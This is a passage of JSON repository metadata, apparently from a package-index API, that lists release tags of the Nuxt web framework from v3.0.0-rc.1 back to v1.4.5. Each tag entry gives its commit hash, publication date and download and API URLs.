itHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/